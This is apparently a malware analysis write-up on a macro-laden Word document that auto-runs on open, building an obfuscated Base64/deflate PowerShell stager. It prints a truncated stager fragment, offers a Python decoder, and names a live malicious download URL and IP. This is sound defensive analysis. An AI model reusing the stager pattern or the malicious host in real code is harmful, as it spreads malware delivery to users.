VirusTotal sample – c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c
File Type: Microsoft Word Document
I used oletools to analyse the Word document's properties and content.
This Word document contains VBA macros.
Parsing the document with olevba reports that the file contains suspicious hex strings and Base64 strings.
The file contains the macros listed below,
and the macros auto-execute when the document is opened.
I then started debugging the macros in the Word document:
After clicking Enable Editing, open View Macros under the View tab.
Click Edit and rename the autoopen() function to autoopen2(), so the macro no longer runs automatically on open and can be stepped through.
There are many small Base64 chunks that are concatenated to build a PowerShell script. I captured the Base64 string in a text file and tried to decode it. I did not recover the complete Base64 string, only part of it, but it is recognisable as a PowerShell script.
(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] [coNverT]::FrOMbase64stRING(('ZZJh'+'i'+'5'+'tAEIb/y'+'n'+'4'+'QNiFVz9YP5US4MbYSS'+'gOmhLN'+'H'+'QXQz'+'6kbd9XSjOUL'+'+e'+'zdtJbSdb7s87z'+'vDO2'+'O8g'+'q5'+'z4P'+'r0E'+'EA'+'an8'+'OI'+'esbXKA5TGfoCJ1PmR2SK'+'bFFZz5ivG45'+'CecZrKJMA'+'wKeV'+'Ut2jbW'+'M'+'7
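As an added example (not part of the original analysis), the Python below reverses the stager's decoding chain: it joins the 'a'+'b'+... chunks, Base64-decodes the result and inflates the raw DeflateStream. Because the fragment above is truncated as captured and cannot be decoded, the example builds its own constructed stager text in the same style and decodes that.

```python
import base64
import random
import re
import zlib

# PowerShell string-concatenation idiom seen in the macro output:
# a parenthesised run of single-quoted pieces joined with '+'.
CHUNK_RE = re.compile(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')*)\s*\)")

def join_chunks(expr):
    """Concatenate the single-quoted pieces of 'a'+'b'+... into one string."""
    return "".join(re.findall(r"'([^']*)'", expr))

def inflate_base64(blob):
    """Undo [Convert]::FromBase64String + DeflateStream (raw deflate, no zlib header)."""
    return zlib.decompress(base64.b64decode(blob), wbits=-15)

def extract_payloads(script_text):
    """Decode every concatenated-chunk expression found in captured script text.
    Expressions that are not valid base64 + raw deflate are skipped."""
    found = []
    for m in CHUNK_RE.finditer(script_text):
        try:
            found.append(inflate_base64(join_chunks(m.group(1))).decode("utf-8", "replace"))
        except (ValueError, zlib.error):
            continue
    return found

def build_sample(plain, seed=7):
    """Constructed stager text in the page's style (test input only, not the real sample).
    Compresses `plain` with raw deflate, base64-encodes it and splits it into 1-8 char chunks."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    b64 = base64.b64encode(comp.compress(plain.encode()) + comp.flush()).decode()
    rng = random.Random(seed)
    pieces, i = [], 0
    while i < len(b64):
        n = rng.randint(1, 8)
        pieces.append("'" + b64[i:i + n] + "'")
        i += n
    return ("(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] "
            "[coNverT]::FrOMbase64stRING((" + "+".join(pieces) + ")), "
            "[Io.comPReSsIOn.cOmPRessIOnMODe]::dECompRESS))")

if __name__ == "__main__":
    demo = build_sample("Write-Output 'second-stage placeholder'")
    print(extract_payloads(demo))
```

Run the same extract_payloads() over the Base64 text captured from the debugger; if the chunk list is incomplete, b64decode or the inflate step fails and the expression is skipped rather than producing garbage.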
During debugging I saw the values below stored in the variable YAAAAAA; the script is reading registry key values.
While debugging, I captured traffic with Wireshark and found that a connection was made to the web site emseenerji[.]com at IP 94[.]73[.]147[.]237. The URL is still alive and can be accessed.
The complete URL accessed by this program was http:// emseenerji[.]com/wp-content/RRKu/
My host machine's AV blocked this URL, so I could not analyse the traffic from this URL to my VM any further.